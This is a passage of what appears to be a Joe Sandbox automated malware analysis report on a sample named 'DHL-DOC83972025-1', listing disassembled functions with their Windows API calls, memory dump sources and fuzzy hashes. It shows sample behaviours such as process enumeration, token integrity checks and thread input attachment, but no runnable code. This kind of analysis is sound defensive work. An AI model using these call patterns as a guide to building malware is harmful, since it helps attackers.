Part of subcall function 00453A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00453A57
Part of subcall function 00453A3D: GetCurrentThreadId.KERNEL32 ref: 00453A5E
Part of subcall function 00453A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004525B3), ref: 00453A65

GetCaretPos.USER32(?), ref: 004816FF
ClientToScreen.USER32(00000000,?), ref: 0048174C
GetForegroundWindow.USER32 ref: 00481752

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: b5c39435ed996edab490c315d1c37d66f5a4a2c00e300833b467c14cb8b8b8f7
Instruction ID: 873be6987ef57565644f96d5261316af38b997820b4839d611ea5a08d4c5e351
Opcode Fuzzy Hash: b5c39435ed996edab490c315d1c37d66f5a4a2c00e300833b467c14cb8b8b8f7
Instruction Fuzzy Hash: EA316375D00249AFC700EFA9C881CAEB7FDEF48304B50446EE515E7211D7359E45CBA4

Function 0045D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0045D501
Process32FirstW.KERNEL32(00000000,?), ref: 0045D50F
Process32NextW.KERNEL32(00000000,?), ref: 0045D52F
CloseHandle.KERNEL32(00000000), ref: 0045D5DC

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: a61937cf820376922656b37d77a6c79433cafd83ebec65df950dfa4b79a1ba02
Instruction ID: ba7b20c07a640273a48932ee7f22237718b2e37a28945cdfb2240ae4bf29b8ec
Opcode Fuzzy Hash: a61937cf820376922656b37d77a6c79433cafd83ebec65df950dfa4b79a1ba02
Instruction Fuzzy Hash: 9131C971004304AFD311EF54C885B7F7BF8EF95344F10092EF585862A2EB719949CB92

Function 00488FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00409BB2

GetCursorPos.USER32(?), ref: 00489001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00447711,?,?,?,?,?), ref: 00489016
GetCursorPos.USER32(?), ref: 0048905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00447711,?,?,?), ref: 00489094

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8e3744e6610c1db73ec4652158673a4499d8772b61d8b77c237cd8a45dbf94ca
Instruction ID: f545f30ff115bfb87a4bb7a597e0e07735d77431f3fc65bbbe1c1214c80004ab
Opcode Fuzzy Hash: 8e3744e6610c1db73ec4652158673a4499d8772b61d8b77c237cd8a45dbf94ca
Instruction Fuzzy Hash: 17218035600418EFCB159F94CC98EFF7BB9EB4A350F18446AF50657261C3399D50EB64

Function 0045D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0048CB68), ref: 0045D2FB
GetLastError.KERNEL32 ref: 0045D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0045D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0048CB68), ref: 0045D376

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: b8c16c7a2b396faa9b40f1cf2c293b32620aa9a38ec57e1c8638ce89e1cf9064
Instruction ID: 7480bcd365b1839bf4ad789e6773b70588f94403a762613714b2cb3a41a4d2a5
Opcode Fuzzy Hash: b8c16c7a2b396faa9b40f1cf2c293b32620aa9a38ec57e1c8638ce89e1cf9064
Instruction Fuzzy Hash: 5B21B4709052019F8310DF24C88196F77E4AE55365F104A6EFC99C72A2D734D90ACB97

Function 00451571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00451014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0045102A
Part of subcall function 00451014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00451036
Part of subcall function 00451014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00451045
Part of subcall function 00451014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0045104C
Part of subcall function 00451014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00451062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004515BE
_memcmp.LIBVCRUNTIME ref: 004515E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00451617
HeapFree.KERNEL32(00000000), ref: 0045161E

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: d22d1c8aeee8fe0e9bea036b78023a41a082773f4326d2f6d3e5519a341669a7
Instruction ID: 708d80028e30d103f1581c5b261554e3694ae9a963a13cf1c0f622b2cc6efdff
Opcode Fuzzy Hash: d22d1c8aeee8fe0e9bea036b78023a41a082773f4326d2f6d3e5519a341669a7
Instruction Fuzzy Hash: 7F218E31E40108EFDF00DFA4C985BEFB7B8EF44345F08445AE851A7252E738AA09CBA4

Function 00482782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0048280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00482824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00482832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00482840

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 8cc2dd4e0feabf636a3510d7a681e67ed5a1c67c3bc24a79fbac06610b889924
Instruction ID: 0b9e71695a6da889295fcdcb40523162e44daf6eb8dbd385221ecdd65c634f7a
Opcode Fuzzy Hash: 8cc2dd4e0feabf636a3510d7a681e67ed5a1c67c3bc24a79fbac06610b889924
Instruction Fuzzy Hash: B8210331204511AFDB14BB24C984FAEBB95EF45324F14865EF8268B6E2C7B9FC42C794

Function 004578F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00458D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0045790A,?,000000FF,?,00458754,00000000,?,0000001C,?,?), ref: 00458D8C
Part of subcall function 00458D7D: lstrcpyW.KERNEL32(00000000,?,?,0045790A,?,000000FF,?,00458754,00000000,?,0000001C,?,?,00000000), ref: 00458DB2
Part of subcall function 00458D7D: lstrcmpiW.KERNEL32(00000000,?,0045790A,?,000000FF,?,00458754,00000000,?,0000001C,?,?), ref: 00458DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00458754,00000000,?,0000001C,?,?,00000000), ref: 00457923
lstrcpyW.KERNEL32(00000000,?,?,00458754,00000000,?,0000001C,?,?,00000000), ref: 00457949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00458754,00000000,?,0000001C,?,?,00000000), ref: 00457984

Strings

cdecl, xrefs: 0045797B

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 929bce5c3ff8eb2fb415c59a692a4c2e5c53fa98697ff74c2e643860815324c9
Instruction ID: eba83ae82543d235a64b1b3eeb507fb383546400172e47e14a996bb93330b060
Opcode Fuzzy Hash: 929bce5c3ff8eb2fb415c59a692a4c2e5c53fa98697ff74c2e643860815324c9
Instruction Fuzzy Hash: A611E47A200241ABDB159F35D884E7B77A5FF85351B10403FEC02C73A6EB359805C7A9

Function 00485660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 004856BB
_wcslen.LIBCMT ref: 004856CD
_wcslen.LIBCMT ref: 004856D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00485816

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 3bb96afa704a5a26be2ec43385794c604ea98f28719872ff7185309e01c9760e
Instruction ID: d19430b1cf300465235462a6f7ddad68ece222a7b8f65f06225857e5dc0e7603
Opcode Fuzzy Hash: 3bb96afa704a5a26be2ec43385794c604ea98f28719872ff7185309e01c9760e
Instruction Fuzzy Hash: 7711E17560060896DF20FF61CC81BEF77ACAF01764B10482BF919E6181EB78CA84CB68

Function 00451A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00451A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00451A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00451A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00451A8A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 858eaf93702a05780f6710ead0720aaa13c8bb139259831702c86703b0003869
Instruction ID: 155ce6991d4b67cf5d9cf5077bb4da9994e553436604a270445afca39f600bcc
Opcode Fuzzy Hash: 858eaf93702a05780f6710ead0720aaa13c8bb139259831702c86703b0003869
Instruction Fuzzy Hash: F4113C3AD01219FFEB11DBA5CD85FADBB78EB04750F2000A6EA00B7290D6716E50DB98

Function 0045E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0045E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0045E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0045E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0045E24D

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: d57009abc8b0a8a07c854bab77bc9e927cf9f4516044d260973ef8a22a89a3eb
Instruction ID: 0fdd78955012a35e7a50c88c50ded66ec9ae3a0577fac1a87a1a4478523b885d
Opcode Fuzzy Hash: d57009abc8b0a8a07c854bab77bc9e927cf9f4516044d260973ef8a22a89a3eb
Instruction Fuzzy Hash: 25110872904254BBD7059FA9AC49E9F7FACDB45315F00466AFC24D32A2D6B48E0487B8

Function 0041D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0041CFF9,00000000,00000004,00000000), ref: 0041D218
GetLastError.KERNEL32 ref: 0041D224
__dosmaperr.LIBCMT ref: 0041D22B
ResumeThread.KERNEL32(00000000), ref: 0041D249

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 08e25b354951f1c0dd05cac1a3489100ce8e14b2ab71963222abf8c890f95aba
Instruction ID: ea23e5cb49b2f9a058dcd1a7e7182827785a7648d8e1e47843ae33961e0331a0
Opcode Fuzzy Hash: 08e25b354951f1c0dd05cac1a3489100ce8e14b2ab71963222abf8c890f95aba
Instruction Fuzzy Hash: 160126B6D041047BC7115BA6DC49BEF7B69DF81334F20026EF825921D0CB758882C7A9

Function 003F600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003F604C
GetStockObject.GDI32(00000011), ref: 003F6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 003F606A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 3de90b0be5d9082c450123add0be58aaac9c90bccaec4198b30f0fc11a1a363c
Instruction ID: cb805cffc32a631ee514fb4a1c3ec3acb275646e226185e981e3f945f4fcae02
Opcode Fuzzy Hash: 3de90b0be5d9082c450123add0be58aaac9c90bccaec4198b30f0fc11a1a363c
Instruction Fuzzy Hash: BE118B7210550EBFEF124FA48C85EFABB69EF083A4F110226FA0552020DB329C60DBA4

Function 00413B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00413B56

Part of subcall function 00413AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00413AD2
Part of subcall function 00413AA3: ___AdjustPointer.LIBCMT ref: 00413AED

_UnwindNestedFrames.LIBCMT ref: 00413B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00413B7C
CallCatchBlock.LIBVCRUNTIME ref: 00413BA4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 0f63c6f4fba2aa4e331f40f41c64457b5adeaca745f58fb13cca8157044ebeb1
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 2A014072100148BBDF115E96CC42EEB3F6DEF88759F04401AFE4856121D73AE9A1DBA4

Function 00423073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,003F13C6,00000000,00000000,?,0042301A,003F13C6,00000000,00000000,00000000,?,0042328B,00000006,FlsSetValue), ref: 004230A5
GetLastError.KERNEL32(?,0042301A,003F13C6,00000000,00000000,00000000,?,0042328B,00000006,FlsSetValue,00492290,FlsSetValue,00000000,00000364,?,00422E46), ref: 004230B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0042301A,003F13C6,00000000,00000000,00000000,?,0042328B,00000006,FlsSetValue,00492290,FlsSetValue,00000000), ref: 004230BF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: f4ddf92c34f8531e2a71e11ef54e8b32ddf90b0df4921d10bfbe1a406d6ecb7a
Instruction ID: a72b0896432964981b10554a49ad5ac60cc6df7d2df6b5a655a47aad46782a79
Opcode Fuzzy Hash: f4ddf92c34f8531e2a71e11ef54e8b32ddf90b0df4921d10bfbe1a406d6ecb7a
Instruction Fuzzy Hash: 8201D832741236ABC7214E78BC8495777A89F05B62B500A35F905E3244C73DD901C7F8

Function 00457464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0045747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00457497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004574AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 004574CA

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 0f5de836845b58a9110449f0ecedc88268bb53e79c24e422514f2d14a148bc58
Instruction ID: 6bd56ac1acfb4f64e91b87b1af515c939a419867e8b570f856d89a0ab287a723
Opcode Fuzzy Hash: 0f5de836845b58a9110449f0ecedc88268bb53e79c24e422514f2d14a148bc58
Instruction Fuzzy Hash: 9411A1B1205310ABE7208F24ED48F967BFCEB01B01F10857EEE16D6152D774E948DBA5

Function 0045B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0045ACD3,?,00008000), ref: 0045B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0045ACD3,?,00008000), ref: 0045B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0045ACD3,?,00008000), ref: 0045B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0045ACD3,?,00008000), ref: 0045B126

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a2dcaf173d5d01ad79728f0c8fa1be6449115417faf9b6635410db79523a5e32
Instruction ID: ee867ad59def7efabe93f633a680ae38d2aba54d8ef32ddd81d9c959849d6d3a
Opcode Fuzzy Hash: a2dcaf173d5d01ad79728f0c8fa1be6449115417faf9b6635410db79523a5e32
Instruction Fuzzy Hash: 07115E31C0191CE7CF00AFE5D9986EEBB78FF09752F10449AD941B2286CB3455558BA9

Function 00452DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00452DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00452DD6
GetCurrentThreadId.KERNEL32 ref: 00452DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00452DE4

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

